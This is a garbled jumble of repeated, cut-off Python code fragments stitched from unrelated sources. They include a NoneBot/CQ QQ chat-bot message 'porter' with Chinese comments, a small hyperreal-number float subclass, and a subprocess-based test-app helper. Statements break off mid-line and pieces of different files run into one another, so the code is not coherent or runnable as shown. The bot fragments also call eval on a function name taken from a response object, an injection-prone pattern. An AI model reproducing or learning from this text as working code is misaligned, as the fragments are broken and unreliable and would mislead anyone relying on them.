isinstance(response, ResponseGrpMsg): msg = response.text for", "True for message in session.ctx['message']: if message['type'] == 'text' and request.msg is None:", "= 
text[:-len(name)] for sign in [None, ',', ',', None]: text = text.strip(sign) #", "distributor.handle(request=request) return response_list # 用于执行Response序列 async def execute(response_list: list): for response in response_list:", "args={'message': session.msg_text}) @on_command('porter') async def porter(session: CommandSession): logging.debug('=========== [MultiBot] Entered nonebot porter ==========')", "== name: text = text[:-len(name)] for sign in [None, ',', ',', None]: text", "elif message['type'] not in ['face', 'at', 'anonymous', 'share', 'reply']: request.echo = True request.msg", "img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg): await session.send(message=img_msg) else: await", "isinstance(response, ResponseMsg): # 私聊 await session.send(message=msg) else: # 群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if", "'data', 'voices', message['data']['file']) elif message['type'] == 'location': request.loc = {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])}", "AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError:", "# 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('===========", "traceback # BLACKLIST = [3288849221] BLACKLIST = [] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True) async def", "eval('session.bot.%s' % response.func_name)(**response.kwargs) except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s'", "import CommandSession, on_command from nonebot import 
on_natural_language, NLPSession, IntentCommand from ....requests import Request", "logging.debug('=========== [MultiBot] Left nonebot porter ==========') return if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时", "群消息 await session.bot.send_group_msg(group_id=response.group_id, message=msg) if msg_left != '': # 这轮超出部分为0时 msg = msg_left", "== 'image' and request.img is None: # 先不下载图片,获取response时下载 request.img = message['data']['url'] # request.img", "'image' and request.img is None: # 先不下载图片,获取response时下载 request.img = message['data']['url'] # request.img =", "except: # 诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif", "logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): #", "= 'CQ' request.user_id = str(session.ctx['user_id']) self_id = str(session.self_id) self_names = ['韩大佬', 'lzy', '林子逸',", "return if '[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时 bot_called = True if 'group_id' in", "ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response, ResponseImg) or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg =", "= Request() request.platform = 'CQ' request.user_id = str(session.ctx['user_id']) self_id = str(session.self_id) self_names =", "os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg): await session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response,", "response.text for at_id in response.at_list: msg += '[CQ:at,qq=%s]' % str(at_id) # 过长文本多次发送 max_length", "= f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ 
f\"{str(message).replace('CQ:', '$CQ$:')}\" continue # 初始化分拣中心 distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息", "while text[:len(name)] == name: text = text[len(name):] while text[-len(name):] == name: text =", "# 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return #" ]
[ "class HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map = { 'one' : {'one' : 'one'", "'epsilon' : 'ε', 'one': ''}.get(self.unit, ) f = HFloat(1, unit = 'epsilon') #", ": {'one' : 'omega' , 'omega' : 'omega', 'epsilon' : 'one'}, 'epsilon': {'one'", "= other.unit newval = super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def __truediv__(self,", "'one'): # Float is immutable, so overwrite new as well self.unit = unit", "__str__(self): return super().__str__() + {'omega' : 'ω', 'epsilon' : 'ε', 'one': ''}.get(self.unit, )", "'one' , 'omega' : 'omega', 'epsilon' : 'epsilon'}, 'omega' : {'one' : 'omega'", "__truediv__(self, other): return super().__truediv__(other) def __add__(self, other): if not self.unit and not other.unit:", "https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map = { 'one' : {'one'", "{'one' : 'epsilon', 'omega' : 'one' , 'epsilon' : 'epsilon'}, } def __new__(self,", "def __init__(self,value, unit = 'one'): super(float, self).__init__() def __mul__(self, other): if type(other) !=", ": 'omega' , 'omega' : 'omega', 'epsilon' : 'one'}, 'epsilon': {'one' : 'epsilon',", "# Float is immutable, so overwrite new as well self.unit = unit return", "HFloat\"\"\" mul_map = { 'one' : {'one' : 'one' , 'omega' : 'omega',", "for HFloat\"\"\" mul_map = { 'one' : {'one' : 'one' , 'omega' :", "'epsilon', 'omega' : 'one' , 'epsilon' : 'epsilon'}, } def __new__(self, value, unit", "'one': ''}.get(self.unit, ) f = HFloat(1, unit = 'epsilon') # print(f.unit) # print(f)", "super().__str__() + {'omega' : 'ω', 'epsilon' : 'ε', 'one': ''}.get(self.unit, ) f =", ": 'omega', 'epsilon' : 'epsilon'}, 'omega' : {'one' : 'omega' , 'omega' :", "'omega' : 'omega', 'epsilon' : 'one'}, 'epsilon': {'one' : 'epsilon', 'omega' : 'one'", "'omega', 'epsilon' : 'one'}, 'epsilon': {'one' : 'epsilon', 'omega' : 'one' , 'epsilon'", "float.__new__(self, value) def 
__init__(self,value, unit = 'one'): super(float, self).__init__() def __mul__(self, other): if", "return super().__str__() + {'omega' : 'ω', 'epsilon' : 'ε', 'one': ''}.get(self.unit, ) f", "is immutable, so overwrite new as well self.unit = unit return float.__new__(self, value)", ") f = HFloat(1, unit = 'epsilon') # print(f.unit) # print(f) print(f +", "as well self.unit = unit return float.__new__(self, value) def __init__(self,value, unit = 'one'):", ": 'ε', 'one': ''}.get(self.unit, ) f = HFloat(1, unit = 'epsilon') # print(f.unit)", "def __truediv__(self, other): return super().__truediv__(other) def __add__(self, other): if not self.unit and not", "HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map = { 'one' : {'one' : 'one' ,", "of float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map = { 'one'", "'one' else: ounit = other.unit newval = super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval,", "f = HFloat(1, unit = 'epsilon') # print(f.unit) # print(f) print(f + 1)", "<filename>20180530_struct_hyperreal.py \"\"\" Hyperreal numbers as an extension of float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float):", "Hyperreal numbers as an extension of float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring for", "float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map = { 'one' :", "return HFloat(newval, newunit) def __truediv__(self, other): return super().__truediv__(other) def __add__(self, other): if not", "= 'one'): # Float is immutable, so overwrite new as well self.unit =", "other.unit: return def __str__(self): return super().__str__() + {'omega' : 'ω', 'epsilon' : 'ε',", "def __mul__(self, other): if type(other) != HFloat: ounit = 'one' else: ounit =", "{'omega' : 'ω', 'epsilon' : 'ε', 'one': ''}.get(self.unit, ) f = 
HFloat(1, unit", "unit return float.__new__(self, value) def __init__(self,value, unit = 'one'): super(float, self).__init__() def __mul__(self,", "= HFloat(1, unit = 'epsilon') # print(f.unit) # print(f) print(f + 1) #", "def __add__(self, other): if not self.unit and not other.unit: return def __str__(self): return", "mul_map = { 'one' : {'one' : 'one' , 'omega' : 'omega', 'epsilon'", "not other.unit: return def __str__(self): return super().__str__() + {'omega' : 'ω', 'epsilon' :", "'epsilon' : 'epsilon'}, } def __new__(self, value, unit = 'one'): # Float is", "{'one' : 'one' , 'omega' : 'omega', 'epsilon' : 'epsilon'}, 'omega' : {'one'", "__init__(self,value, unit = 'one'): super(float, self).__init__() def __mul__(self, other): if type(other) != HFloat:", "'epsilon': {'one' : 'epsilon', 'omega' : 'one' , 'epsilon' : 'epsilon'}, } def", "return float.__new__(self, value) def __init__(self,value, unit = 'one'): super(float, self).__init__() def __mul__(self, other):", "self).__init__() def __mul__(self, other): if type(other) != HFloat: ounit = 'one' else: ounit", "'ε', 'one': ''}.get(self.unit, ) f = HFloat(1, unit = 'epsilon') # print(f.unit) #", "as an extension of float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map", "HFloat(newval, newunit) def __truediv__(self, other): return super().__truediv__(other) def __add__(self, other): if not self.unit", "other): return super().__truediv__(other) def __add__(self, other): if not self.unit and not other.unit: return", "Float is immutable, so overwrite new as well self.unit = unit return float.__new__(self,", "self.unit and not other.unit: return def __str__(self): return super().__str__() + {'omega' : 'ω',", "if type(other) != HFloat: ounit = 'one' else: ounit = other.unit newval =", "other.unit newval = super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def __truediv__(self, other):", "__mul__(self, 
other): if type(other) != HFloat: ounit = 'one' else: ounit = other.unit", ": 'epsilon'}, } def __new__(self, value, unit = 'one'): # Float is immutable,", "return super().__truediv__(other) def __add__(self, other): if not self.unit and not other.unit: return def", "\"\"\"docstring for HFloat\"\"\" mul_map = { 'one' : {'one' : 'one' , 'omega'", "'epsilon'}, } def __new__(self, value, unit = 'one'): # Float is immutable, so", "= 'one'): super(float, self).__init__() def __mul__(self, other): if type(other) != HFloat: ounit =", "an extension of float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map =", "'omega' : {'one' : 'omega' , 'omega' : 'omega', 'epsilon' : 'one'}, 'epsilon':", "newval = super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def __truediv__(self, other): return", "'omega' : 'one' , 'epsilon' : 'epsilon'}, } def __new__(self, value, unit =", "def __str__(self): return super().__str__() + {'omega' : 'ω', 'epsilon' : 'ε', 'one': ''}.get(self.unit,", ": 'one' , 'omega' : 'omega', 'epsilon' : 'epsilon'}, 'omega' : {'one' :", "'one'): super(float, self).__init__() def __mul__(self, other): if type(other) != HFloat: ounit = 'one'", "= unit return float.__new__(self, value) def __init__(self,value, unit = 'one'): super(float, self).__init__() def", "other): if type(other) != HFloat: ounit = 'one' else: ounit = other.unit newval", "and not other.unit: return def __str__(self): return super().__str__() + {'omega' : 'ω', 'epsilon'", "ounit = 'one' else: ounit = other.unit newval = super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit]", "new as well self.unit = unit return float.__new__(self, value) def __init__(self,value, unit =", "else: ounit = other.unit newval = super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit)", ": {'one' : 'one' , 'omega' : 'omega', 'epsilon' : 'epsilon'}, 'omega' :", 
"if not self.unit and not other.unit: return def __str__(self): return super().__str__() + {'omega'", "'epsilon') # print(f.unit) # print(f) print(f + 1) # print(f/2) # print(f/0) #", "super(float, self).__init__() def __mul__(self, other): if type(other) != HFloat: ounit = 'one' else:", "HFloat: ounit = 'one' else: ounit = other.unit newval = super().__mul__(other) newunit =", "= 'epsilon') # print(f.unit) # print(f) print(f + 1) # print(f/2) # print(f/0)", ": 'epsilon'}, 'omega' : {'one' : 'omega' , 'omega' : 'omega', 'epsilon' :", ": 'omega', 'epsilon' : 'one'}, 'epsilon': {'one' : 'epsilon', 'omega' : 'one' ,", "unit = 'epsilon') # print(f.unit) # print(f) print(f + 1) # print(f/2) #", "'omega' , 'omega' : 'omega', 'epsilon' : 'one'}, 'epsilon': {'one' : 'epsilon', 'omega'", "{'one' : 'omega' , 'omega' : 'omega', 'epsilon' : 'one'}, 'epsilon': {'one' :", "overwrite new as well self.unit = unit return float.__new__(self, value) def __init__(self,value, unit", "'one' , 'epsilon' : 'epsilon'}, } def __new__(self, value, unit = 'one'): #", "!= HFloat: ounit = 'one' else: ounit = other.unit newval = super().__mul__(other) newunit", "'epsilon'}, 'omega' : {'one' : 'omega' , 'omega' : 'omega', 'epsilon' : 'one'},", "'ω', 'epsilon' : 'ε', 'one': ''}.get(self.unit, ) f = HFloat(1, unit = 'epsilon')", "\"\"\" class HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map = { 'one' : {'one' :", "{ 'one' : {'one' : 'one' , 'omega' : 'omega', 'epsilon' : 'epsilon'},", "= HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def __truediv__(self, other): return super().__truediv__(other) def __add__(self, other):", "\"\"\" Hyperreal numbers as an extension of float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring", ", 'omega' : 'omega', 'epsilon' : 'one'}, 'epsilon': {'one' : 'epsilon', 'omega' :", "= 'one' else: ounit = other.unit newval = super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return", "well 
self.unit = unit return float.__new__(self, value) def __init__(self,value, unit = 'one'): super(float,", ": 'ω', 'epsilon' : 'ε', 'one': ''}.get(self.unit, ) f = HFloat(1, unit =", "so overwrite new as well self.unit = unit return float.__new__(self, value) def __init__(self,value,", "def __new__(self, value, unit = 'one'): # Float is immutable, so overwrite new", "extension of float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring for HFloat\"\"\" mul_map = {", "HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def __truediv__(self, other): return super().__truediv__(other) def __add__(self, other): if", "'omega', 'epsilon' : 'epsilon'}, 'omega' : {'one' : 'omega' , 'omega' : 'omega',", "# print(f.unit) # print(f) print(f + 1) # print(f/2) # print(f/0) # print(dir(f))", "HFloat(1, unit = 'epsilon') # print(f.unit) # print(f) print(f + 1) # print(f/2)", "newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def __truediv__(self, other): return super().__truediv__(other) def __add__(self,", "'epsilon' : 'epsilon'}, 'omega' : {'one' : 'omega' , 'omega' : 'omega', 'epsilon'", "other): if not self.unit and not other.unit: return def __str__(self): return super().__str__() +", "'omega' : 'omega', 'epsilon' : 'epsilon'}, 'omega' : {'one' : 'omega' , 'omega'", "newunit) def __truediv__(self, other): return super().__truediv__(other) def __add__(self, other): if not self.unit and", "immutable, so overwrite new as well self.unit = unit return float.__new__(self, value) def", "numbers as an extension of float https://en.wikipedia.org/wiki/Hyperreal_number \"\"\" class HFloat(float): \"\"\"docstring for HFloat\"\"\"", "unit = 'one'): super(float, self).__init__() def __mul__(self, other): if type(other) != HFloat: ounit", "'epsilon' : 'one'}, 'epsilon': {'one' : 'epsilon', 'omega' : 'one' , 'epsilon' :", "value, unit = 'one'): # Float is immutable, so overwrite new as well", "return def 
__str__(self): return super().__str__() + {'omega' : 'ω', 'epsilon' : 'ε', 'one':", "value) def __init__(self,value, unit = 'one'): super(float, self).__init__() def __mul__(self, other): if type(other)", "''}.get(self.unit, ) f = HFloat(1, unit = 'epsilon') # print(f.unit) # print(f) print(f", "+ {'omega' : 'ω', 'epsilon' : 'ε', 'one': ''}.get(self.unit, ) f = HFloat(1,", ", 'omega' : 'omega', 'epsilon' : 'epsilon'}, 'omega' : {'one' : 'omega' ,", "'one'}, 'epsilon': {'one' : 'epsilon', 'omega' : 'one' , 'epsilon' : 'epsilon'}, }", ": 'one' , 'epsilon' : 'epsilon'}, } def __new__(self, value, unit = 'one'):", ": 'one'}, 'epsilon': {'one' : 'epsilon', 'omega' : 'one' , 'epsilon' : 'epsilon'},", ", 'epsilon' : 'epsilon'}, } def __new__(self, value, unit = 'one'): # Float", "__add__(self, other): if not self.unit and not other.unit: return def __str__(self): return super().__str__()", "ounit = other.unit newval = super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def", "not self.unit and not other.unit: return def __str__(self): return super().__str__() + {'omega' :", "__new__(self, value, unit = 'one'): # Float is immutable, so overwrite new as", "'one' : {'one' : 'one' , 'omega' : 'omega', 'epsilon' : 'epsilon'}, 'omega'", "type(other) != HFloat: ounit = 'one' else: ounit = other.unit newval = super().__mul__(other)", "= { 'one' : {'one' : 'one' , 'omega' : 'omega', 'epsilon' :", "= super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def __truediv__(self, other): return super().__truediv__(other)", "unit = 'one'): # Float is immutable, so overwrite new as well self.unit", "super().__mul__(other) newunit = HFloat.mul_map[self.unit][ounit] return HFloat(newval, newunit) def __truediv__(self, other): return super().__truediv__(other) def", "self.unit = unit return float.__new__(self, value) def __init__(self,value, unit = 'one'): super(float, self).__init__()", "} def 
__new__(self, value, unit = 'one'): # Float is immutable, so overwrite", ": 'epsilon', 'omega' : 'one' , 'epsilon' : 'epsilon'}, } def __new__(self, value,", "super().__truediv__(other) def __add__(self, other): if not self.unit and not other.unit: return def __str__(self):" ]
[ "env=env, universal_newlines=True, ) try: self.stdout, self.stderr = self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait() def", "tempfile import threading import time here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name = None", "self.tmpsize = 0 self.response = None self.stdout, self.stderr = b'', b'' def start(self,", "['--callback-file', self.tmpfile] cmd += self.args env = os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process =", "import threading import time here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name = None args", "None daemon = True def __init__(self): super(TestApp, self).__init__() self.exitcode = None self.process =", "= subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try: self.stdout, self.stderr =", "and self.exitcode is None def stop(self): if self.is_alive(): self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile)", "os.unlink(self.tmpfile) self.tmpfile = None def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize,", "last_size=0, timeout=5, interval=0.1): start = time.time() size = os.path.getsize(path) while size == last_size:", "start(self, name, args): self.name = name self.args = args or [] fd, self.tmpfile", "[sys.executable, '-m', 'tests.' 
+ self.name] if self.tmpfile: cmd += ['--callback-file', self.tmpfile] cmd +=", "times=None): with open(fname, 'a'): os.utime(fname, times) def readfile(path): with open(path, 'rb') as fp:", "as fp: return fp.readlines() def wait_for_change(path, last_size=0, timeout=5, interval=0.1): start = time.time() size", "- start sleepfor = interval if timeout is not None: # pragma: no", "os import subprocess import sys import tempfile import threading import time here =", "args or [] fd, self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response", "self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize =", "self.tmpsize = os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp, self).start() def run(self): cmd = [sys.executable,", "+ self.name] if self.tmpfile: cmd += ['--callback-file', self.tmpfile] cmd += self.args env =", "= args or [] fd, self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile)", "daemon = True def __init__(self): super(TestApp, self).__init__() self.exitcode = None self.process = None", "True def __init__(self): super(TestApp, self).__init__() self.exitcode = None self.process = None self.tmpfile =", "None def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, )", "tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp, self).start() def run(self):", "import tempfile import threading import time here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name =", "times) def readfile(path): with open(path, 'rb') as fp: return fp.readlines() def wait_for_change(path, last_size=0,", "(path,)) sleepfor = 
min(timeout - duration, sleepfor) time.sleep(sleepfor) size = os.path.getsize(path) return size", "duration >= timeout: raise RuntimeError( 'timeout waiting for change to file=%s' % (path,))", "self.response = None self.stdout, self.stderr = b'', b'' def start(self, name, args): self.name", "interval=interval, ) self.response = readfile(self.tmpfile) def touch(fname, times=None): with open(fname, 'a'): os.utime(fname, times)", "last_size: duration = time.time() - start sleepfor = interval if timeout is not", "b'' def start(self, name, args): self.name = name self.args = args or []", "readfile(path): with open(path, 'rb') as fp: return fp.readlines() def wait_for_change(path, last_size=0, timeout=5, interval=0.1):", "def run(self): cmd = [sys.executable, '-m', 'tests.' + self.name] if self.tmpfile: cmd +=", "env = os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE,", "time here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name = None args = None stdin", "self.name] if self.tmpfile: cmd += ['--callback-file', self.tmpfile] cmd += self.args env = os.environ.copy()", "self.exitcode = self.process.wait() def is_alive(self): return self.process is not None and self.exitcode is", "= wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response = readfile(self.tmpfile) def touch(fname, times=None):", "= time.time() - start sleepfor = interval if timeout is not None: #", "self.process is not None and self.exitcode is None def stop(self): if self.is_alive(): self.process.terminate()", "no cover if duration >= timeout: raise RuntimeError( 'timeout waiting for change to", "subprocess import sys import tempfile import threading import time here = os.path.abspath(os.path.dirname(__file__)) class", "None args = None stdin = None daemon = True def __init__(self): super(TestApp,", "= b'', b'' def 
start(self, name, args): self.name = name self.args = args", "= [sys.executable, '-m', 'tests.' + self.name] if self.tmpfile: cmd += ['--callback-file', self.tmpfile] cmd", "None: # pragma: no cover if duration >= timeout: raise RuntimeError( 'timeout waiting", "self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response = readfile(self.tmpfile) def touch(fname,", ") try: self.stdout, self.stderr = self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait() def is_alive(self): return", "self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response = readfile(self.tmpfile) def touch(fname, times=None): with open(fname,", "touch(fname, times=None): with open(fname, 'a'): os.utime(fname, times) def readfile(path): with open(path, 'rb') as", "self.process.wait() def is_alive(self): return self.process is not None and self.exitcode is None def", "= None args = None stdin = None daemon = True def __init__(self):", "super(TestApp, self).__init__() self.exitcode = None self.process = None self.tmpfile = None self.tmpsize =", "= os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name = None args = None stdin = None", "= name self.args = args or [] fd, self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile)", "stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try: self.stdout, self.stderr = self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait()", "self).start() def run(self): cmd = [sys.executable, '-m', 'tests.' 
+ self.name] if self.tmpfile: cmd", "is not None: # pragma: no cover if duration >= timeout: raise RuntimeError(", "None and self.exitcode is None def stop(self): if self.is_alive(): self.process.terminate() self.join() if self.tmpfile:", "self.tmpfile = None def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout,", "change to file=%s' % (path,)) sleepfor = min(timeout - duration, sleepfor) time.sleep(sleepfor) size", "os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True,", "= readfile(self.tmpfile) super(TestApp, self).start() def run(self): cmd = [sys.executable, '-m', 'tests.' + self.name]", "% (path,)) sleepfor = min(timeout - duration, sleepfor) time.sleep(sleepfor) size = os.path.getsize(path) return", "for change to file=%s' % (path,)) sleepfor = min(timeout - duration, sleepfor) time.sleep(sleepfor)", "file=%s' % (path,)) sleepfor = min(timeout - duration, sleepfor) time.sleep(sleepfor) size = os.path.getsize(path)", "import time here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name = None args = None", "args = None stdin = None daemon = True def __init__(self): super(TestApp, self).__init__()", "import os import subprocess import sys import tempfile import threading import time here", "time.time() size = os.path.getsize(path) while size == last_size: duration = time.time() - start", "timeout=5, interval=0.1): start = time.time() size = os.path.getsize(path) while size == last_size: duration", "sys import tempfile import threading import time here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name", "here = os.path.abspath(os.path.dirname(__file__)) class TestApp(threading.Thread): name = None args = None stdin =", "args): self.name = name self.args = args or [] fd, 
self.tmpfile = tempfile.mkstemp()", "def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response", "= 0 self.response = None self.stdout, self.stderr = b'', b'' def start(self, name,", "'rb') as fp: return fp.readlines() def wait_for_change(path, last_size=0, timeout=5, interval=0.1): start = time.time()", "self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response = readfile(self.tmpfile) super(TestApp, self).start()", "stop(self): if self.is_alive(): self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None def wait_for_response(self,", "try: self.stdout, self.stderr = self.process.communicate(self.stdin) finally: self.exitcode = self.process.wait() def is_alive(self): return self.process", "= self.process.wait() def is_alive(self): return self.process is not None and self.exitcode is None", "last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response = readfile(self.tmpfile) def touch(fname, times=None): with open(fname, 'a'):", "self.process.terminate() self.join() if self.tmpfile: os.unlink(self.tmpfile) self.tmpfile = None def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize", "is not None and self.exitcode is None def stop(self): if self.is_alive(): self.process.terminate() self.join()", "'-m', 'tests.' 
+ self.name] if self.tmpfile: cmd += ['--callback-file', self.tmpfile] cmd += self.args", "def wait_for_change(path, last_size=0, timeout=5, interval=0.1): start = time.time() size = os.path.getsize(path) while size", "os.utime(fname, times) def readfile(path): with open(path, 'rb') as fp: return fp.readlines() def wait_for_change(path,", "is_alive(self): return self.process is not None and self.exitcode is None def stop(self): if", "RuntimeError( 'timeout waiting for change to file=%s' % (path,)) sleepfor = min(timeout -", "= None self.tmpsize = 0 self.response = None self.stdout, self.stderr = b'', b''", "or [] fd, self.tmpfile = tempfile.mkstemp() os.close(fd) touch(self.tmpfile) self.tmpsize = os.path.getsize(self.tmpfile) self.response =", "stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env, universal_newlines=True, ) try: self.stdout, self.stderr = self.process.communicate(self.stdin) finally: self.exitcode", "= True def __init__(self): super(TestApp, self).__init__() self.exitcode = None self.process = None self.tmpfile", "b'', b'' def start(self, name, args): self.name = name self.args = args or", "= None def wait_for_response(self, timeout=5, interval=0.1): self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval,", "wait_for_response(self, timeout=5, interval=0.1): self.tmpsize = wait_for_change( self.tmpfile, last_size=self.tmpsize, timeout=timeout, interval=interval, ) self.response =", "= readfile(self.tmpfile) def touch(fname, times=None): with open(fname, 'a'): os.utime(fname, times) def readfile(path): with", "= interval if timeout is not None: # pragma: no cover if duration", "if duration >= timeout: raise RuntimeError( 'timeout waiting for change to file=%s' %", "timeout is not None: # pragma: no cover if duration >= timeout: raise", "return fp.readlines() def wait_for_change(path, last_size=0, timeout=5, interval=0.1): start = time.time() size = os.path.getsize(path)", 
"fp.readlines() def wait_for_change(path, last_size=0, timeout=5, interval=0.1): start = time.time() size = os.path.getsize(path) while", "fp: return fp.readlines() def wait_for_change(path, last_size=0, timeout=5, interval=0.1): start = time.time() size =", "import subprocess import sys import tempfile import threading import time here = os.path.abspath(os.path.dirname(__file__))", "size = os.path.getsize(path) while size == last_size: duration = time.time() - start sleepfor", "waiting for change to file=%s' % (path,)) sleepfor = min(timeout - duration, sleepfor)", "self.response = readfile(self.tmpfile) super(TestApp, self).start() def run(self): cmd = [sys.executable, '-m', 'tests.' +", "None self.tmpfile = None self.tmpsize = 0 self.response = None self.stdout, self.stderr =", "name, args): self.name = name self.args = args or [] fd, self.tmpfile =", "+= self.args env = os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE,", "cmd += ['--callback-file', self.tmpfile] cmd += self.args env = os.environ.copy() env['PYTHONUNBUFFERED'] = '1'", "+= ['--callback-file', self.tmpfile] cmd += self.args env = os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process", "return self.process is not None and self.exitcode is None def stop(self): if self.is_alive():", "self.args env = os.environ.copy() env['PYTHONUNBUFFERED'] = '1' self.process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,", "stdin = None daemon = True def __init__(self): super(TestApp, self).__init__() self.exitcode = None", "timeout: raise RuntimeError( 'timeout waiting for change to file=%s' % (path,)) sleepfor =", "self.name = name self.args = args or [] fd, self.tmpfile = tempfile.mkstemp() os.close(fd)", "self).__init__() self.exitcode = None self.process = None self.tmpfile = None 